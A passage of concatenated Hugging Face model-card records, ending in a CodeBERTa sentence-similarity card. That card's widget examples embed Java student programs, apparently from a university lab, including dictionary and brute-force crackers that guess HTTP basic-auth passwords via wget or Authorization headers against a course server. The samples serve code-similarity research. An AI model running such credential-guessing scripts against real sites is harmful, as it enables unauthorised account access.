"gensyn",
"I am domestic_peckish_buffalo",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-21T10:52:45Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am domestic_peckish_buffalo
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
leom21/Qwen3-0.6B-SFT-20250923151500
|
leom21
| 2025-09-23T15:19:38Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"trl",
"sft",
"hf_jobs",
"conversational",
"dataset:leom21/cron-expression-dataset",
"base_model:Qwen/Qwen3-0.6B",
"base_model:finetune:Qwen/Qwen3-0.6B",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:18:04Z |
---
base_model: Qwen/Qwen3-0.6B
datasets: leom21/cron-expression-dataset
library_name: transformers
model_name: Qwen3-0.6B-SFT-20250923151500
tags:
- generated_from_trainer
- trl
- sft
- hf_jobs
licence: license
---
# Model Card for Qwen3-0.6B-SFT-20250923151500
This model is a fine-tuned version of [Qwen/Qwen3-0.6B](https://huggingface.co/Qwen/Qwen3-0.6B) on the [leom21/cron-expression-dataset](https://huggingface.co/datasets/leom21/cron-expression-dataset) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="leom21/Qwen3-0.6B-SFT-20250923151500", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
Frezer02/retrained_llama32-1bn-finetuned
|
Frezer02
| 2025-09-23T15:15:11Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:15:00Z |
---
base_model: unsloth/llama-3.2-1b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Frezer02
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3.2-1b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
buelfhood/SOCO-Java-CODEBERTA-CONTRASTIVE-PAIRS-E1-B16-LR2e-05-Split0.1
|
buelfhood
| 2025-09-23T15:14:46Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:77328",
"loss:ContrastiveLoss",
"arxiv:1908.10084",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/CodeBERTa-small-v1",
"model-index",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T15:14:32Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:77328
- loss:ContrastiveLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: "\n\n\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\
\nimport javax.naming.Context;\nimport javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\npublic class DictionaryPropertyHelper {\n\n\
\tprivate static Properties dictProps;\n\n\n\n\tpublic DictionaryPropertyHelper()\
\ {\n\t}\n\n\n\t\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the dictionary Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\
\treturn dictProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(dictProps == null){\n\t\t\tdictProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tDictionaryPropertyHelper.class.getResourceAsStream(\"\
/dictionary.properties\");\n\t\t\tdictProps.load(fis);\n\t\t}\n\t}\n}\n\n"
sentences:
- "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\nimport javax.naming.Context;\n\
import javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper\
\ {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper()\
\ {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\
return testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"\
/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n"
- "\n\n\n\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic\
\ class WatchDog\n{\n\n public WatchDog()\n {\n }\n\n public static void main(String[]\
\ args)\n {\n try\n {\n if( args.length != 2 )\n \
\ {\n System.out.println(\"USAGE: java WatchDog <URL> <mailing UserName>\"\
);\n System.exit(0);\n }\n\n Runtime.getRuntime().exec(\"\
rm LastWatch.html\");\n Runtime.getRuntime().exec(\"rm WatchDog.ini\"\
);\n\n Thread.sleep(1000);\n\n while (true)\n \
\ {\n WatchDog myWatchDog = new WatchDog();\n \
\ myWatchDog.readHTML(args[0], args[1]);\n\n Runtime.getRuntime().exec(\"\
rm Report.txt\");\n Runtime.getRuntime().exec(\"rm diffReport.txt\"\
);\n Runtime.getRuntime().exec(\"rm NewWatch.txt\");\n\n \
\ System.out.println(\" check after 2 ... press Ctrl-Z suspend WatchDog...\"\
);\n\n Thread.sleep(2*60*1000); \n\n\n }\n }\n\
\ catch (Exception e)\n {\n e.printStackTrace();\n }\n\
\ }\n\n void readHTML (String strHTML, String userName)\n {\n\n Properties\
\ myProp = loadLastMD5 ();\n\n try\n {\n\n System.out.println(\"Running\
\ WatchDog \\\"\" + strHTML + \"\\\" ...... Please Wait....\");\n\n URL\
\ url = new URL (strHTML);\n\n String strHost = url.getHost().toLowerCase();\n\
\n Runtime r = Runtime.getRuntime();\n\n\n\n \n\n \n \n\n InputStream\
\ in = url.openStream();\n\n DataInputStream bf = new DataInputStream (in);\n\
\n FileOutputStream fOut = new FileOutputStream (\"Watch.html\");\n \
\ DataOutputStream dOut = new DataOutputStream (fOut);\n\n Vector vtrImages\
\ = new Vector ();\n\n while ( bf!= null)\n {\n\n String str\
\ = bf.readLine();\n\n if (str == null)\n break;\n\n\n \
\ if ( str.toLowerCase().indexOf(\"img\") > 0 )\n {\n \
\ int indexImg = str.toLowerCase().indexOf(\"img\");\n int indexImgUrl\
\ = str.toLowerCase().indexOf(\"\\\"\", indexImg);\n int indexImgUrlEnd\
\ = str.toLowerCase().indexOf(\"\\\"\", indexImgUrl+1);\n\n String\
\ strImage = str.toLowerCase().substring(indexImgUrl+1, indexImgUrlEnd);\n\n \
\ if (strImage.toLowerCase().indexOf(strHost) > 0)\n {\n\
\ int index = strImage.toLowerCase().indexOf(strHost) + strHost.length();\n\
\ strImage = strImage.toLowerCase().substring(index);\n \
\ }\n\n if (!vtrImages.contains(strImage.toLowerCase()))\n \
\ vtrImages.add (strImage.toLowerCase());\n }\n\n \
\ dOut.writeBytes(str+\"\\n\");\n }\n\n dOut.print();\n fOut.print();\n\
\ \n \n\n for (int i=0 ; i < vtrImages.size() ; i ++)\n {\n\n \
\ \n r.exec(\"wget \" + strHost + vtrImages.get(i).toString().trim());\n\
\ }\n\n Thread.sleep(2000);\n\n String [] command = {\"//sh\",\
\ \"-c\",\"md5sum *.* > NewWatch.txt\"};\n\n Runtime.getRuntime().exec(command);\n\
\n Thread.sleep(1000);\n\n FileInputStream fIn = new FileInputStream\
\ (\"NewWatch.txt\");\n DataInputStream = new DataInputStream (fIn);\n\n\
\ Properties prop = new Properties ();\n\n while ( bf != null)\n \
\ {\n\n String str = bf.readLine();\n\n if (str == null)\n\
\ break;\n\n int index = str.indexOf(\" \");\n\n\n \
\ if (fileDownloaded (str.substring(index + 1), vtrImages) || str.substring(index\
\ + 1).trim().equalsIgnoreCase(\"Watch.html\") )\n prop.setProperty(str.substring(index\
\ + 1).trim().toLowerCase(), str.substring(0, index).trim().toLowerCase());\n\
\ }\n\n \n fIn.close();\n\n int isAnyChange = GenerateChangeFile\
\ (strHTML, myProp, prop);\n\n if (isAnyChange > 0)\n {\n\n if\
\ (isAnyChange == 2)\n {\n File f = new File (\"LastWatch.html\"\
);\n\n if (! f.exists())\n {\n f.createNewFile();\n\
\ Thread.sleep(1000);\n }\n\n String [] diffCommand\
\ = {\"//sh\", \"-c\",\"diff Watch.html LastWatch.html > diffReport.txt\"};\n\n\
\ Runtime.getRuntime().exec(diffCommand);\n\n Thread.sleep(2000);\n\
\n FileInputStream feIn = new FileInputStream (\"diffReport.txt\");\n\
\ DataInputStream deIn = new DataInputStream (feIn);\n\n \
\ FileOutputStream feOut = new FileOutputStream (\"Report.txt\", true);\n \
\ DataOutputStream deOut = new DataOutputStream (feOut);\n\n \
\ deOut.writeBytes(\"\\n\\n\\nDifferences in Target :\\n\\n\");\n\n \
\ while (deIn != null)\n {\n String str = deIn.readLine();\n\
\n if (str == null)\n break;\n\n \
\ deOut.writeBytes(str + \"\\n\");\n }\n\n deOut.print();\n\
\ feOut.print();\n\n deIn.close();\n feIn.close();\n\
\ }\n\n String [] mailCommand = {\"//sh\", \"-c\",\"less Report.txt\
\ | mail \" + userName};\n\n Runtime.getRuntime().exec(mailCommand);\n\n\
\ System.out.println(\"Mailing difference\");\n }\n else\n \
\ System.out.println(\" difference detected\");\n\n\n Runtime.getRuntime().exec(\"\
mv Watch.html LastWatch.html\");\n\n }\n catch (Exception e)\n {\n \
\ e.printStackTrace();\n }\n\n }\n\n private Properties loadLastMD5\
\ ()\n {\n Properties myProp = new Properties ();\n\n try\n {\n\
\ myProp.load(new FileInputStream (\"WatchDog.ini\"));\n }\n \
\ catch (Exception e)\n {\n }\n\n return myProp;\n }\n\n private\
\ boolean fileDownloaded (String strFile, Vector vtrImages)\n {\n for (\
\ int i = 0 ; i < vtrImages.size() ; i ++ )\n {\n String strImage\
\ = vtrImages.get(i).toString().trim();\n\n if ( strImage.toLowerCase().indexOf(strFile.toLowerCase().trim())\
\ > -1 )\n return true;\n }\n\n return false;\n }\n\n\
\ private int GenerateChangeFile (String strUrl, Properties myProp, Properties\
\ prop)\n {\n int change = 0;\n boolean boolMainChange = false;\n\n\
\ try\n {\n FileOutputStream myOut = new FileOutputStream (\"\
WatchDog.ini\");\n DataOutputStream myIniOut = new DataOutputStream (myOut);\n\
\n FileOutputStream fOut = new FileOutputStream (\"Report.txt\");\n \
\ DataOutputStream dOut = new DataOutputStream (fOut);\n\n dOut.writeBytes(\"\
Report of changes for \\\"\" + strUrl + \"\\\":\\n\\n\\n\\n\\n\");\n\n \
\ Enumeration e = prop.keys();\n\n while (e.hasMoreElements())\n \
\ {\n String file = e.nextElement().toString().toLowerCase().trim();\n\
\n Runtime.getRuntime().exec(\"rm \" + file);\n\n myIniOut.writeBytes(file.toLowerCase()\
\ + \"=\" + prop.getProperty(file) + \"\\n\");\n\n if (myProp.containsKey(file))\n\
\ {\n String OldValue = myProp.getProperty(file);\n\
\ String newValue = prop.getProperty(file);\n\n \
\ if (OldValue != null && newValue != null)\n {\n \
\ if (!OldValue.trim().equals(newValue.trim()))\n \
\ {\n if (file.toLowerCase().trim().equalsIgnoreCase(\"\
Watch.html\"))\n {\n dOut.writeBytes(\"\
Traget html has been changed\\n\");\n boolMainChange\
\ = true;\n }\n else\n \
\ dOut.writeBytes(\"File \\\"\" + file + \"\\\" has been\
\ changed\\n\");\n\n change = 1;\n \
\ }\n }\n }\n else\n \
\ {\n if (file.toLowerCase().trim().equalsIgnoreCase(\"Watch.html\"\
))\n {\n dOut.writeBytes(\"Target html\
\ is checked for first time\\n\");\n boolMainChange = true;\n\
\ }\n else\n dOut.writeBytes(\"\
File \\\"\" + file + \"\\\" is checked for first time and is new\\n\");\n\n \
\ change = 1;\n }\n }\n\n dOut.print();\n\
\ fOut.print();\n\n myIniOut.close();\n myOut.close();\n\
\ }\n catch (Exception ex)\n {\n ex.printStackTrace ();\n\
\ }\n\n if (boolMainChange)\n return 2;\n\n return change;\n\
\ }\n}"
- "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\nimport javax.naming.Context;\n\
import javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper\
\ {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper()\
\ {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\
return testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"\
/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n"
- source_sentence: "\n\nimport java.io.*;\nimport java.*;\nimport java.util.StringTokenizer;\n\
\npublic class Dictionary\n{\n public static void main(String args[])\n {\n\
\ final String DICT_FILE = \"/usr/share/lib/dict/words\"; \n String\
\ basic_url = \"http://sec-crack.cs.rmit.edu./SEC/2/\"; \n String password;\n\
\ String s = null;\n int num_tries = 0;\n \n try\n {\n\
\ \n BufferedReader dict_word = new BufferedReader\n \
\ (new FileReader (DICT_FILE));\n \n \n \
\ while((password = dict_word.readLine())!= null)\n { \n \
\ try \n {\n \n Process p = Runtime.getRuntime().exec(\"\
wget --http-user= --http-passwd=\" + password + \" \" + basic_url);\n \
\ \n BufferedReader stdInput = new BufferedReader(new \n \
\ InputStreamReader(p.getInputStream()));\n\n \
\ BufferedReader stdError = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\n\
\n \n while ((s = stdInput.readLine()) != null)\n\
\ {\n System.out.println(s);\n }\n\
\ \n \n while ((s = stdError.readLine())\
\ != null)\n {\n System.out.println(s);\n \
\ }\n\n try\n\t {\n p.waitFor();\
\ \n }\n catch (InterruptedException g) \n \
\ {\n } \n\n num_tries++;\n \
\ \n if((p.exitValue()) == 0) \n { \n \
\ System.out.println(\"**********PASSWORD IS: \" + password);\n\
\t System.out.println(\"**********NUMBER OF TRIES: \" + num_tries);\n\
\ System.exit(1);\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(\"\
exception happened - here's what I know: \");\n e.printStackTrace();\n\
\ System.exit(-1);\n }\n }\n \n \
\ System.out.println(\"DICTIONARY BRUTE FORCE UNABLE FIND PASSWORD\");\n \
\ System.out.println(\"**********Sorry, password was not found in dictionary\
\ file\");\n System.exit(1);\n\n }\n catch (FileNotFoundException\
\ exception)\n {\n System.out.println(exception);\n }\n \
\ catch (IOException exception)\n {\n System.out.println(exception);\n\
\ }\n }\n}\n \n"
sentences:
- "\n\nimport java.io.*;\nimport java.*;\n\npublic class BruteForce \n{\n public\
\ static void main(String args[]) \n {\n String s = null;\n String\
\ basic_url = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n\n \n String\
\ alphabets = new String(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
);\n \n String password = null;\n int len = 0;\n int num_tries\
\ = 0;\n\n len = alphabets.length();\n \n \n for (int i=0;\
\ i<len; i++)\n {\n for (int j=0; j<len; j++)\n\t {\n \
\ for (int k=0; k<len; k++)\n\t {\n try \n {\n\
\ \n password = String.valueOf(alphabets.charAt(i))\
\ + String.valueOf(alphabets.charAt(j)) + String.valueOf(alphabets.charAt(k));\n\
\ \n System.out.print(alphabets.charAt(i)); \n\
\ System.out.print(alphabets.charAt(j)); \n \
\ System.out.println(alphabets.charAt(k)); \n\n \n \
\ Process p = Runtime.getRuntime().exec(\"wget --http-user= --http-passwd=\"\
\ + password + \" \" + basic_url);\n \n BufferedReader\
\ stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n\
\ while ((s = stdInput.readLine()) != null)\n \
\ {\n System.out.println(s);\n }\n \
\ \n \n while ((s = stdError.readLine())\
\ != null)\n {\n System.out.println(s);\n\
\ }\n \n try\n\t\t {\n\
\ p.waitFor(); \n }\n catch\
\ (InterruptedException g) \n {\n } \n\n \
\ num_tries++;\n \n if((p.exitValue())\
\ == 0)\n { \n System.out.println(\"\
**********PASSWORD IS: \" + password);\n\t System.out.println(\"**********NUMBER\
\ OF TRIES: \" + num_tries);\n System.exit(1);\n \
\ }\n }\n catch (IOException e)\n \
\ {\n System.out.println(\"exception happened - here's\
\ what I know: \");\n e.printStackTrace();\n \
\ System.exit(-1);\n }\n }\n }\n }\n \
\ }\n}\n\n"
- "\n\n\n\nimport java.io.*;\nimport java.net.*;\nimport java.*;\nimport java.util.*;\n\
\npublic class DictionaryAttack\n{\n\tpublic static void main ( String args[])\n\
\t{\n\t\t\n\t\tString function,pass,temp1;\n\t\tint count =0;\n\t\t\n\t\ttry{\n\
\t\t\t\t\n\t\tFileReader fr = new FileReader(\"words.txt\");\n\t\tBufferedReader\
\ bfread = new BufferedReader(fr);\n\n\t\tRuntime rtime = Runtime.getRuntime();\n\
\t\tProcess prs = null;\t\n\n\n\t\twhile(( bf = bfread.readLine()) != null)\n\t\
\t{\n\t\t \n\t\t\t\t\n\t\t\t\tif( f.length() < 4 )\n\t\t\t\t{\n\t\t\t\t\tSystem.out.println(+\
\ \" The Attack Number =====>\" + count++ );\n\t\t \t\tpass = f;\n\t\t\t\
\t\n\t\t\t\t\tfunction =\"wget --http-user= --http-passwd=\"+pass+\" http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\t\t\t\t\tprs = rtime.exec(function);\n\t\t\t\t \n\t\t\t\t\tInputStreamReader\
\ stre = new InputStreamReader(prs.getErrorStream());\n \
\ \t\t\tBufferedReader bread = new BufferedReader(stre);\n\t\t\t\t\twhile( (temp1\
\ = bread.readLine())!= null)\n\t\t\t\t\t{\n\t\t\t\t\t\tSystem.out.println(temp1);\n\
\t\t\t\t\t\tif(temp1.equals(\"HTTP request sent, awaiting response... 200 OK\"\
))\n \t\t\t\t{\n\t\t\t System.out.println(\"\
The password has is:\"+pass);\n \t\t\t System.exit(0);\n\
\ \t\t\t\t}\t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\n\
\t\t}\n\t\t\t\n\t\t\tfr.print();\n\t\t\tbfread.close();\n\t\n\t\t\t}catch(Exception\
\ e){}\n\t}\n\t\n}\t\t\t\n"
- "\n\nimport java.net.*;\nimport java.io.IOException;\nimport java.util.*;\nimport\
\ java.io.*;\npublic class BruteForce {\n \n \n \n String passwordLetters[]\
\ ={\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"\
m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"\
z\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"\
M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"\
Z\"};\n String password=\" \";\n static int counter;\n static int noOfAttempts;\n\
\ static String userName=\"\";\n HttpURLConnection u;\n boolean threadF,threadM;\n\
\ String passBase64;\n \n PasswordCrackThreadF passwordCrackThreadF;\n PasswordCrackThreadM\
\ passwordCrackThreadM;\n URL url;\n \n \n public BruteForce() {\n breakPassword();\n\
\ }\n\n public static void main (String args[]) {\n new BruteForce();\n\
\ }\n \n \n \n private void breakPassword() {\n int j;\n \n breakOneLetterPassword();\n\
\ \n breakTwoLetterPassword();\n \n \n \n\n passwordCrackThreadF\
\ = new PasswordCrackThreadF(0,26,counter++,passwordLetters,userName,this);\n\
\ \n passwordCrackThreadM = new PasswordCrackThreadM(26,52,counter++,passwordLetters,userName,this);\n\
\ \n passwordCrackThreadF.print();\n passwordCrackThreadM.print();\n\
\ }\n \n \n private void breakOneLetterPassword() { \n MyHttpURLConnection\
\ httpURLConnection;\n try {\n\t \n\t url = new URL( \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n\t \n\t passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u = (HttpURLConnection)url.openConnection();\n\t u.setRequestProperty(\"\
Authorization\", \" \" + passBase64);\n } catch (IOException io) {io.printStackTrace();}\n\
\ \n loop: for (int i=0;i<52;i++) {\n password\
\ = passwordLetters[i];\n\t\t \n\t\t password =\":\"+ password;\n \
\ try {\n \n\t \t u= (HttpURLConnection)url.openConnection();\n\
\t\t passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u.setRequestProperty(\"Authorization\", \" \" + passBase64);\n\
\t\t u.connect();\t\n\t\t noOfAttempts++; \n\t\t if (u.getContentLength()\
\ != 0) {\n\t\t \n\t\t if (u.getResponseCode()== HttpURLConnection.HTTP_OK\
\ ) {\n\t\t \n\t System.out.println (\"Your User\
\ Name : Password is \"+password);\n\t\t\t\t System.out.println(\" \");\n\t\
\t\t System.out.println(\" of Attempts / Requests \"+ noOfAttempts);\n\
\t\t\t \n\t\t\t System.exit(0);\n \n\t \
\ }\n\t\t }\n\t\t } catch (ProtocolException px) {px.printStackTrace();\n\
\ \n } catch ( NoRouteToHostException nr)\
\ {nr.printStackTrace();\n\t } catch (BindException e){e.printStackTrace();\n\
\t } catch (IndexOutOfBoundsException e3){e3.printStackTrace();\n\t\
\ } catch (IOException io) {io.printStackTrace();\n\t\t \n\t \
\ } finally {u.disconnect();\n\t }\n } \n }\n \n \
\ \n private void breakTwoLetterPassword() { \n MyHttpURLConnection \
\ httpURLConnection; \n try {\n\t \n\t url = new URL( \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n\t \n\t passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u = (HttpURLConnection)url.openConnection();\n\t u.setRequestProperty(\"\
Authorization\", \" \" + passBase64);\n } catch (IOException io) {io.printStackTrace();}\n\
\n \n loop: for (int i=0;i<52;i++) {\n for (int j=0;j<52;j++)\
\ {\n password = passwordLetters[i]+passwordLetters[j];\n\t\t\
\ \n\t\t password =\":\"+ password;\n\t\t \n\t\t \n\t \n \
\ try {\n\t\t u= (HttpURLConnection)url.openConnection();\n\
\t\t\t passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u.setRequestProperty(\"Authorization\", \"\
\ \" + passBase64);\n\t\t\tu.connect();\n\t\t\tnoOfAttempts++;\n\t\t\t\n \
\ \t if (u.getContentLength() != 0) {\n\t\t if (u.getResponseCode()==\
\ HttpURLConnection.HTTP_OK ) {\n\t System.out.println\
\ (\"Your User Name : Password is \"+password); \n\t\t\t System.out.println(\"\
\ \");\n\t\t\t System.out.println(\" of Attempts / Requests \"+ noOfAttempts);\n\
\t\t\t \n\t\t\t System.exit(0);\n\t }\n\t\t }\n\
\t\t \n\t\t\n\t } catch (ProtocolException px) {px.printStackTrace();\n\
\ } catch ( NoRouteToHostException nr) {nr.printStackTrace();\n\
\t } catch (BindException e){e.printStackTrace();\n\t } catch\
\ (IndexOutOfBoundsException e3){e3.printStackTrace();\n\t } catch\
\ (IOException io) {io.printStackTrace();\n\t\t \n\t } finally {u.disconnect();\n\
\t }\n } \n }\n\n\n }\n}\n\nclass PasswordCrackThreadF\
\ extends Thread {\n \n \n \n private String passwordLetters[] ;\n \
\ private String password=\" \";\n private static String userName=\"\";\n\
\ private MyHttpURLConnection httpURLConnection;\n private URL url;\n\
\ \n BruteForce bruteForce;\n int count; \n String passBase64;\n \
\ private HttpURLConnection u;\n \n int start,stop;\n \n static boolean\
\ found;\n \n PasswordCrackThreadF(int start,int stop,int counter,String[]\n\
\ passwordLetters,String userName,BruteForce\
\ bruteForce) {\n this.start = start;\n this.stop = stop;\n \
\ this.passwordLetters =passwordLetters;\n this.userName=userName;\n \
\ count =counter;\n this.bruteForce=bruteForce; \n bruteForce.threadF=true;\n\
\t\n \n passBase64 = new bruteForce.misc.BASE64Encoder().encode(password.getBytes());\n\
\ try {\n\t \n\t url = new URL( \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n\t \n\n\t u = (HttpURLConnection)url.openConnection();\n \
\ \n\t u.setRequestProperty(\"Authorization\", \" \" + passBase64);\n\t\
